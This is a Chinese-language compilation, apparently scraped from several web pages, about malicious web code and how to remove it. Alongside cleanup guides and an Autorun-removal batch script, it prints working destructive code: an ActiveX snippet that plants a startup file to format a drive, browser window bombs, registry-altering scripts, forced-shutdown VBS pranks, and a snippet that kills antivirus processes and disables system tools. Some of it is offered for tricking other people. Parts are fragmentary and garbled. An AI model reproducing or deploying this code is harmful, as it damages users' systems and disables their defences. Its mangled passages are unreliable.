计算机病毒 网页病毒及其清除代码
网页恶意代码总结
网页恶意代码大总结(共15项)1、格式化硬盘<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object><script>scr.Reset();scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";scr.Doc="<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object><script>wsh. Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.);</"+"SCRIPT>";scr.write();2、使WINDOWS 98掉线的代码<html><head></head><a href="wincrash.htm" on mouseclick="alert("Go To Hell,Mall!")">HaHa!</a></html>wincrash.htm<HTML><BODY><IMG SRC="c:\con\con"><!-- or nul\nul, clock$\clock$ --><!-- or aux\aux, config$\config$ --></BODY></HTML>3、IE视窗炸弹或者叫让IE不段循环的代码<HTML><HEAD><TITLE>f\*\*k USA</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></HEAD><BODY onload="WindowBomb()"><SCRIPT LANGUAGE="javascript">function WindowBomb(){var iCounter = 0 // dummy counterwhile (true){window.open("","CRASHING" + iCounter,"width=1,height=1,resizable=no")iCounter++}}</script></BODY></HTML>4、造成IE 5.0崩溃的代码<HTML><BODY><script>var color = new Array;color[1] = "black";color[2] = "white";for(x = 0; x <3; x++){document.bgColor = color[x]if(x == 2){x = 0;}}</SCRIPT></BODY></HTML>5、进入WINDOWS 之前弹出来的对话框代码到注册表找到LegalNoticeCaption ,LegalNoticeText 删除<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.Act iveXComponent></APPLET>");function f(){try{//ActiveX initializationa1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();try{if (documents .cookie.indexOf("Chg") == -1){Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏网页教学网");Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏网页教学网");Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章");Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章");var expdate = new Date((new Date()).getTime() + (1));documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"}}catch(e){}}catch(e){}}function init(){setTimeout("f()", 1000);}init();</SCRIPT>6、造成WINDOWS98 不能关机的代码。
教你手工清除网页恶意代码-电脑资料
教你手工清除网页恶意代码-电脑资料Tny380{display:none;}1.清除每次开机时自动弹出的网页记住地址栏里出现的网址,然后打开注册表编辑器(方法是在点击开始菜单,之后点击运行,在运行框中输入regedit命令进入注册表编辑器),分别定位到:HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run和HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Runonce下,看看在该子项下是否有一个以这个网址为值的值项,如果有的话,就将其删除,之后重新启动计算机,。
这样在下一次开机的时候就不再会有网页弹出来了。
不过网页恶意代码的编写者有时也是非常的狡猾,他会在注册表的不同键值中多处设有这个值项,这样上面提的方法也未必能完全解决问题。
遇到这种情况,你可以在注册表编辑器的选项菜单里选择编辑rarr;查找,在查找对话框内输入开机时自动打开的网址,然后点击查找下一个,将查找到的值项删除。
另外,如果你是使用Windows98的用户,可在开始菜单中的运行对话框内输入msconfig,点击确定,打开系统配置实用程序并打开启动选项卡,检查其中是否有非常可疑的启动项,如果有的话请将其禁用(在程序前的打上勾),然后重启机器就可以了。
如果你所使用的是WindowsNT/2000的用户,可以把Windows98下的系统配置实用程序复制过来并运行进行查找清除。
2.IE标题栏被修改在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值WindowTitle下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
具体说来受到更改的注册表项目为:orer\Main\WindowTitleHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer \Main\WindowTitle解决办法:1).在Windows启动后,点击开始rarr;运行菜单项,在打开栏中键入regedit,然后按确定键;2).展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExpl orer\Main下,在右半部分窗口中找到串值WindowTitle,将该串值删除即可,或将WindowTitle的键值改为IE浏览器等你喜欢的名字;3).同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer \Main然后按2)中所述方法处理。
清除恶意代码
清除恶意代码关于恶意代码清除现在仍不时听到关于恶意代码的问题,其实这个东西已经落伍了。
目前所说的[恶意代码]通常是指嵌入网页中的部分代码,或利用IE漏洞、或利用合法的Script进行恶作剧或恶意破坏。
一.首先还是把这些代码进行分类。
1.利用IE溢出代码进行破坏2.利用合法的脚本语句进行破坏3.通过IE5.0的漏洞利用ActiveX进行破坏常见的就是修改注册表项目及运行程序、生成文件等。
(其实平时常说的也就是这类被杀毒软件评为网页病毒的恶意代码,我们今天主要讨论的也是这类的问题)二.接着说一下防治方法1.对于第1类,只有及时打补丁,别无他法。
就目前我找到的这类代码而言,其功能都是十分有限的。
不过劝你还是及时打下补丁。
2.对于第2类,禁止脚本可能带来很多麻烦,此方法并不现实。
所以,也没有较好的方法,只能尽量不要打开陌生的页子。
3.对于第3类,防范方法很多,依次介绍一下。
a).这是最简单最实用的方法,不借助第三方软件运行regedit.exe,将注册表中的[HKEY_CLASSES_ROOT\CLSID\{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}]主键全部删除。
删除后并不影响系统运行及网页浏览。
b).如果你对注册表操作的方法有所顾忌,试试下面的方法,同样不借助第三方软件将Windows98中的Windows Script Host卸载,把Windows2K 中的Remote Registry Service服务禁用。
c).禁用脚本这样做会带来很多麻烦,所以不实用。
还有很多方法也不实用,在此不作介绍。
d).特别说明--错误方法错误解释:因为该页子修改注册表,所以可以先锁定regedit.exe来达到预防其修改注册表的目的。
错误原因:修改注册表是因为IE5的漏洞利用ActiveX修改注册表,并没有使用regedit.exe命令。
我曾经在《电脑报》、《网友世界》、《黑客防线精华本》以及某杀毒软件的官方网站上看到如此不负责的解释,真让人感到遗憾。
计算机病毒代码有哪些
计算机病毒代码有哪些计算机病毒代码介绍一:void main(){while(1){}}//死循环,电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){..........//循环查找文件写入垃圾数据,省略若干代码}最好hook openprocess这个东东让任务管理器都结束不掉想象力是无限的,看你怎么玩。
计算机病毒代码介绍二:给你个恶搞的玩on error resume nextdim wshshellaset wshshella = w.createobject("w.shell")wshshella.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim ado while(a "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim wshshellset wshshell = w.createobject("w.shell")wshshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"计算机病毒代码介绍三:最简单的一个电脑病毒1.vbs版本:打开记事本,输入以下代码:do until 1=2w.echo "烦死你!"loop保存为1.vbs,运行后不断出现"烦死你"的对话框。
计算机病毒代码
msgbox "You are foolish!"
loop
------------------------------------------------------------------------------ 好了,今天就到这里,这些是不是很有趣呢?
###################代码开始【这段不用复制】################### dim a,s
set wshshell=createobject("wscript.shell")
a=0
for i=1 to 100
msgbox"还有"&(100-i)&"只绵羊",22 next ###################代码结束【这段不用复制】################### 将扩展名由txt改成VBS即可
第3种程序 关机 ###################代码开始【这段不用复制】################### shutdown -r -t 60 -c"系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由nt authortty/system初始的" ###################代码结束【这段不用复制】################### 4 关不掉的窗口 ------------------------------------------------------------------------------
do wshshell.r源自n"notepad"
a=a+1
if a>20 then
常见的几种网页恶意代码解析及解决方案
常见的几种网页恶意代码解析及解决方案网页恶意代码(又称网页病毒)是利用网页来进行破坏的病毒,使用一些SCRIPT语言编写的一些恶意代码利用IE的漏洞来实现病毒植入。
网页恶意代码的技术基础是WSH,其通用的中文译名为“Windows 脚本宿主”。
当用户登录某些含有网页病毒的网站时,网页病毒便被悄悄激活,这些病毒一旦激活,可以利用系统的一些资源进行破坏。
一、篡改IE的默认页有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。
具体说就是以下注册表项被修改:HKEY_LOCAL_MACHINESof twareMicrosoftInternet ExplorerMainDefault_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。
二、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"Settings"=dword:1HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"Links"=dword:1HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"SecAddSites"=dword:1解决办法:将上面这些DWORD值改为“0”即可恢复功能。
最简单的电脑病毒代码是什么
最简单的电脑病毒代码是什么你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由店铺给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!最简单的电脑病毒代码介绍:绕过杀毒软件防御:运行(“taskkill /f /im kavsvc.exe”, 假, 1)运行(“taskkill /f /im KVXP.kxp”, 假, 1)运行(“taskkill /f /im Rav.exe”, 假, 1)运行(“taskkill /f /im Ravmon.exe”, 假, 1)运行(“taskkill /f /im Mcshield.exe”, 假, 1)运行(“taskkill /f /im VsTskMgr.exe”, 假, 1)修改系统时间:置现行时间 (到时间(“8888年8月8日”))禁用任务管理器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \DisableTaskMgr”, 0)禁用注册表:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \Disableregistrytools”, 1)隐藏开始中的运行禁止WIN2000/XP通过任务管理器创建新任务:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoRun”, 1)隐藏“MS-DOS方式”下的磁盘驱动器。
不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:写注册项(3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)隐藏开始中的关机:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索:写注册项(3, “Softw are\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)OVER360防御:写注册项(4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)结束360进程运行(“taskkill /f /im 360tray.exe”, 假, 1)隐藏所有驱动器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDrives”, 4294967295)禁止所有驱动器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoViewOnDrive”, 4294967295)隐藏文件夹选项:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFolderOptions”, 1)将桌面对象隐藏:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDesktop”, 1)隐藏开始中的关机:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)这条有两种情况。
计算机病毒源代码什么样
计算机病毒源代码什么样万恶的计算机病毒也是有源代码组成的,那么计算机病毒代码长什么样呢?下面由店铺给你做出详细的计算机病毒源代码介绍!希望对你有帮助!计算机病毒源代码介绍一:给你个恶搞的玩on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"把这段复制,新建一个文本文档,粘贴进去,保存,然后右击,属性,将后缀由.txt改为.vbs 确定就行了!以后双击这个vbs文件就能捉弄人了计算机病毒源代码介绍二:最简单的一个电脑病毒1.VBS版本:打开记事本,输入以下代码:Do Until 1=2Wscript.echo "烦死你!"Loop保存为1.VBS,运行后不断出现"烦死你"的对话框。
电脑病毒代号有哪些.doc
电脑病毒代号有哪些每个人都有绰号,电脑病毒也有代号,下面由我给你做出详细的电脑病毒代号介绍!希望对你有帮助!电脑病毒代号介绍:1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。
这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。
如CIH病毒。
2、蠕虫病毒蠕虫病毒的前缀是:Worm。
这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。
比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。
木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。
木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。
现在这两种类型都越来越趋向于整合了。
一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60 。
这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为"密码"的英文"password"的缩写)一些黑客程序如:网络枭雄(her.Client)等。
4、脚本病毒脚本病毒的前缀是:Script。
脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦 ^_^。
脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
清除恶意代码的方法
清除恶意代码的方法一、安装杀毒软件杀毒软件是一种专门用来检测和清除计算机中的恶意代码的程序。
目前市场上有很多流行的杀毒软件,如Norton、Kaspersky、360等。
安装杀毒软件之后,需要进行实时保护,设置自动扫描和病毒库更新。
如果发现感染恶意代码,杀毒软件会提示用户进行清除或隔离操作。
二、使用反恶意软件反恶意软件是一种专门对付特定恶意代码的程序。
AdwCleaner是一款专门用来清除广告软件和浏览器劫持的工具。
当用户发现浏览器不能正常运行,或者强制打开某个网站时,可以运行AdwCleaner进行检测和清除。
三、手动清除对于某些恶意代码,普通的杀毒软件和反恶意软件可能并不能完全清除。
需要通过手动清除的方法去除。
手动清除需要用户有一定的计算机知识,深入了解恶意程序的文件位置和修改记录。
可以通过打开任务管理器,杀掉病毒的进程;通过系统资源管理器,找到病毒所在的文件夹,删除所有相关文件。
四、重装系统有些恶意代码非常难以清除,甚至会修改系统文件和注册表,进而导致系统崩溃。
在这种情况下,用户可以考虑重装操作系统。
不过,重装操作系统需要备份重要的个人文件和设置,以及准备所有安装软件的光盘或下载链接。
五、防范恶意代码最好的办法是预防恶意代码的感染。
切勿下载或安装来路不明的软件;不要轻易打开陌生邮件或点击陌生链接;定期更新操作系统和杀毒软件,尽量避免使用不安全的第三方软件;使用强密码,并启用双重认证等高安全标准。
清除恶意代码是保护计算机安全的必要步骤。
通过安装杀毒软件、使用反恶意软件、手动清除、重装系统以及防范恶意代码等方法,我们可以保护计算机不受恶意代码的攻击。
随着互联网技术的飞速发展,恶意代码也越来越复杂和难以清除。
为了有效地防范和清除恶意代码,计算机用户需要充分了解不同类型的恶意代码和其传播方式,同时掌握一些基本的防范和清除技巧。
一、病毒病毒是一种常见的恶意代码,它可以通过感染其他文件来传播。
一旦文件被感染,病毒就开始执行它的命令,并尝试感染其他文件。
网页恶意代码
恶意代码(网页病毒)如今的网络真是不太平,若您问上网者最讨厌和最害怕的是什么,莫过于所谓的恶意代码(又叫网页病毒)了。
稍不留神逛到一个恶意网站上,就会发现自己的IE标题栏换成了其他网站的名字、默认主页成了他家的自留地、系统被改得乱七八糟……更恐怖的还有让你的系统禁止使用、格式化硬盘、安装一个木马在机器上等等。
这样一来,岂不是网上哪也不敢去了?其实不然,只要我们掌握了一些对付此等恶意代码的"绝招"就可尽情地放心冲浪了,本专题我们就来探讨一下恶意代码的类型及其对付方法:恶意代码危害逐个析:1.禁止使用电脑危害程度:★★★★感染概率:**现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"、"运行"、"注销"、注册表编辑器、DOS程序、运行任何程序被禁止,系统无法进入"实模式"、驱动器被隐藏。
解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给"废"了,建议重装。
2.格式化硬盘危害程度:★★★★★感染概率:*现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能,让你无意中格式化自己的硬盘。
只要你浏览了含有它的网页,浏览器就会弹出一个警告说"当前的页面含有不安全的ActiveX,可能会对你造成危害",问你是否执行。
如果你选择"是"的话,硬盘就会被快速格式化,因为格式化时窗口是最小化的,你可能根本就没注意,等发现时已悔之晚矣。
解决办法:除非你知道自己是在做什么,否则不要随便回答"是"。
该提示信息还可以被修改,如改成"Windows正在删除本机的临时文件,是否继续",所以千万要注意!此外,将计算机上、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。
google搜索“恶意代码”清除技巧与步骤
Autorun病毒清除工具bat代码介绍
Autorun 病毒清除工具bat代码介绍电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。
本程序运行后自动清除每个盘符下面的Autorun 病毒,Echo本程序原理是基于读取每个盘符下的Autorun.inf相关字段复制代码代码如下:@Echo Offcolor 2ftitle Autorun 病毒清除工具-By PhexonRem 杀进程taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul 2>nul:clearautoclsEcho.Echo Autorun 病毒清除工具Echo.Echo.Echo.Echo 制作:PhexonEcho.Echo 本程序运行后自动清除每个盘符下面的Autorun病毒Echo 本程序原理是基于读取每个盘符下的Autorun.inf相关字段Echo.Echo [1] 仅仅删除所有盘符下的 Autorun 病毒Echo [2] 删除所有盘符下的 Autorun 病毒并且建立同名免疫目录(推荐!)Echo [3] 禁用系统的 Autorun 机制以避免 Autorun 病毒的再次感染Echo [4] 取消所有盘符的 Autorun 病毒免疫Echo [5] 删除并免疫指定盘符的 Autorun 病毒Echo [6] 取消免疫指定盘符Echo [7] 恢复相关注册表项默认值Echo [0] 退出Echo.Set /p clearslt= 请输入您的选择(1/2/3/4/5/6/7/0):If "%clearslt%"=="" Goto clearautoIf "%clearslt%"=="1" Goto clearauto1If "%clearslt%"=="2" Goto clearauto2If "%clearslt%"=="3" Goto clearauto3If "%clearslt%"=="4" Goto clearauto4If "%clearslt%"=="5" Goto clearauto5If "%clearslt%"=="6" Goto clearauto6If "%clearslt%"=="7" Goto clearauto7If "%clearslt%"=="0" Exit:clearauto1taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul 2>nulFor %%a In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do (fsutil fsinfo drivetype %%a: |find /i "固定驱动器" && (For /f "tokens=2 delims==" %%b In (%%a:\autorun.inf) Do Del /a /f /q "%%a:\%%b" >nul 2>nulDel /a /f /q %%a:\autorun.inf >nul 2>nul) >nul 2>nulfsutil fsinfo drivetype %%a: |find /i "可移动驱动器" && (For /f "tokens=2 delims==" %%b In (%%a:\autorun.inf) Do Del /a /f /q "%%a:\%%b" >nul 2>nulDel /a /f /q %%a:\autorun.inf >nul 2>nul) >nul 2>nul)clsEcho Autorun 病毒清除完毕,任意键返回……pause>nulGoto clearauto:clearauto2taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul 2>nulFor %%a In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do (fsutil fsinfo drivetype %%a: |find /i "固定驱动器" && (For /f "tokens=2 delims==" %%b In (%%a:\autorun.inf) Do Del /a /f /q "%%a:\%%b" & md "%%a:\%%b\免疫目录不要删除!...\" & attrib +s +h +r "%%a:\%%b" & Echo Y|cacls "%%a:\%%b" /T /C /P everyone:N >nul 2>nulDel /a /f /q %%a:\autorun.inf & md "%%a:\autorun.inf\免疫目录不要删除!...\" & attrib +s +h +r %%a:\autorun.inf & Echo Y|cacls "%%a:\autorun.inf" /T /C /P everyone:N >nul 2>nul ) >nul 2>nulfsutil fsinfo drivetype %%a: |find /i "可移动驱动器" && (For /f "tokens=2 delims==" %%b In (%%a:\autorun.inf) Do Del /a /f /q "%%a:\%%b" & md "%%a:\%%b\免疫目录不要删除!...\" & attrib +s +h +r "%%a:\%%b" & Echo Y|cacls "%%a:\%%b" /T /C /P everyone:N >nul 2>nulDel /a /f /q %%a:\autorun.inf & md "%%a:\autorun.inf\免疫目录不要删除!...\" & attrib +s +h +r %%a:\autorun.inf & Echo Y|cacls "%%a:\autorun.inf" /T /C /P everyone:N >nul 2>nul ) >nul 2>nul)clsEcho Autorun 病毒清除并免疫完毕,任意键返回……pause>nulGoto clearauto:clearauto3clsEcho.Echo 正在停止相关服务……Echo.reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000ff /f >nul 2>nulreg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000ff /f >nul 2>nulnet stop ShellHWDetection >nul 2>nulsc config ShellHWDetection start= disabled >nul 2>nulRem 添加防止从回收站或仿回收站的目录中直接运行可执行文件的策略SetREGPATH=HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer \CodeIdentifiers\0\PathsSet SFLAG=/v SaferFlags /t REG_DWORD /d 0x00000000 /fSet IDATA=/f /v ItemData /d "?:\Recyc?reg add %REGPATH%\{00ffa5bf-abe7-4901-aacf-4f58aa31217a} %SFLAG%>nulreg add %REGPATH%\{00ffa5bf-abe7-4901-aacf-4f58aa31217a} %IDATA%\*\*\*\*.*">nulreg add %REGPATH%\{41fe7eed-c47a-46f6-840a-240796fd03cf} %SFLAG%>nulreg add %REGPATH%\{41fe7eed-c47a-46f6-840a-240796fd03cf} %IDATA%\*\*\*.*">nulreg add %REGPATH%\{4e93c91c-a40e-462e-9b89-3b0832d222d9} %SFLAG%>nulreg add %REGPATH%\{4e93c91c-a40e-462e-9b89-3b0832d222d9} %IDATA%\*.*">nulreg add %REGPATH%\{5bfc100b-d3fb-450e-88ec-6819ab56a9ff} %SFLAG%>nulreg add %REGPATH%\{5bfc100b-d3fb-450e-88ec-6819ab56a9ff} %IDATA%\*\*\*\*.*">nulreg add %REGPATH%\{5c5e2bcd-7057-43f4-830c-e4361d2afadd} %SFLAG%>nulreg add %REGPATH%\{5c5e2bcd-7057-43f4-830c-e4361d2afadd} %IDATA%\*.*">nulreg add %REGPATH%\{5f8ff865-0638-4c6e-98de-923e7bc6b330} %SFLAG%>nulreg add %REGPATH%\{5f8ff865-0638-4c6e-98de-923e7bc6b330} %IDATA%\*\*\*.*">nulreg add %REGPATH%\{649c1429-0e79-453c-abe9-b5682e035ae7} %SFLAG%>nulreg add %REGPATH%\{649c1429-0e79-453c-abe9-b5682e035ae7} %IDATA%\*\*.*">nulreg add %REGPATH%\{718f54b2-c669-4d7b-aeff-18d69f100034} %SFLAG%>nulreg add %REGPATH%\{718f54b2-c669-4d7b-aeff-18d69f100034} %IDATA%\*\*.*">nulreg add %REGPATH%\{8385d9d2-80c9-4ac1-a100-ed3e62863d97} %SFLAG%>nulreg add %REGPATH%\{8385d9d2-80c9-4ac1-a100-ed3e62863d97} %IDATA%\*.*">nulreg add %REGPATH%\{af2a4fcf-441c-421e-9663-52cd3502cfd7} %SFLAG%>nulreg add %REGPATH%\{af2a4fcf-441c-421e-9663-52cd3502cfd7} %IDATA%\*\*\*.*">nulreg add %REGPATH%\{b997f4b2-c037-4e97-b051-31f5d86df802} %SFLAG%>nulreg add %REGPATH%\{b997f4b2-c037-4e97-b051-31f5d86df802} %IDATA%\*\*.*">nulreg add %REGPATH%\{d4e7b6ff-d76f-407f-b8bb-ea0835f5babc} %SFLAG%>nulreg add %REGPATH%\{d4e7b6ff-d76f-407f-b8bb-ea0835f5babc} /f /v ItemData /d "RECYC*.*">nulRem 清除喜欢利用回收站的移动磁盘自动运行病毒For %%a In (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) Do (For %%b In (exe pif com) Do (Echo Y|cacls "%%a:\Recycler\*.%%b" /C /T /P everyone:F>nul 2>nul&Echo Y|cacls "%%a:\Recycled\*.%%b" /C /T /P everyone:F>nul 2>nul&Echo Y|cacls "%%a:\Recycled\Recycled\*.%%b" /C /T /P everyone:F>nul 2>nul Del /A /F /S /Q "%%a:\Recycler\*.%%b">nul 2>nul&Del /A /F /S /Q "%%a:\Recycled\*.%%b">nul 2>nul&Del /A /F /S /Q "%%a:\Recycled\Recycled\*.%%b">nul 2>nul))>nul 2>nulEcho.Echo 相关服务已停止并禁用,任意键返回……pause >nulGoto clearauto:clearauto4For %%a In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do (fsutil fsinfo drivetype %%a: |find /i "固定驱动器" && (cacls "%%a:\autorun.inf" /T /C /P everyone:F&Del /a /f /q "%%a:\autorun.inf" & rd /s /q "%%a:\autorun.inf">nul 2>nul )>nul 2>nulfsutil fsinfo drivetype %%a: |find /i "可移动驱动器" && (cacls "%%a:\autorun.inf" /T /C /P everyone:F&Del /a /f /q "%%a:\autorun.inf" & rd /s /q "%%a:\autorun.inf">nul 2>nul )>nul 2>nul)clsEcho.Echo 已经解除全部盘符的免疫,任意键返回……pause>nulGoto clearauto:clearauto5clsEcho.Set /p pf= 请输入盘符,如"F:"(不包括引号)Echo 即将免疫%pf%盘……|fi nd /i ":"||Set pf=%pf%:&&Echo 即将免疫%pf%盘……taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IMsxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul 2>nulfsutil fsinfo drivetype %pf% |find /i "固定驱动器" && (For /f "tokens=2 delims==" %%a In (%pf%\autorun.inf) Do Del /a /f /q "%pf%\%%a" & md "%pf%\%%a\免疫目录不要删除!...\" & attrib +s +h +r "%pf%\%%a" & Echo Y|cacls "%pf%\%%a" /T /C /P everyone:N >nul 2>nulDel /a /f /q %pf%\autorun.inf & md "%pf%\autorun.inf\免疫目录不要删除!...\" & attrib +s +h +r %pf%\autorun.inf & Echo Y|cacls "%pf%\autorun.inf" /T /C /P everyone:N >nul 2>nul Goto DoneclearAuto) >nul 2>nulfsutil fsinfo drivetype %pf% |find /i "可移动驱动器" && (For /f "tokens=2 delims==" %%a In (%pf%\autorun.inf) Do Del /a /f /q "%pf%\%%a" & md "%pf%\%%a\免疫目录不要删除!...\" & attrib +s +h +r "%pf%\%%a" & Echo Y|cacls "%pf%\%%a" /T /C /P everyone:N >nul 2>nulDel /a /f /q %pf%\autorun.inf & md "%pf%\autorun.inf\免疫目录不要删除!...\" & attrib +s +h +r %pf%\autorun.inf & Echo Y|cacls "%pf%\autorun.inf" /T /C /P everyone:N >nul 2>nul Goto DoneclearAuto) >nul 2>nulEcho.Echo 您所输入的盘符不存在或者是只读设备,Echo 请重新输入Goto clearauto5:DoneclearAutoclsEcho.Echo 指定的磁盘 %pf% 已经成功进行了 Autorun 病毒的清除及免疫Echo.Echo [1] 继续免疫其他磁盘Echo [0] 返回主菜单Set /p choice= 请输入您的选择(1/0):If %choice%="" Goto DoneclearAutoIf 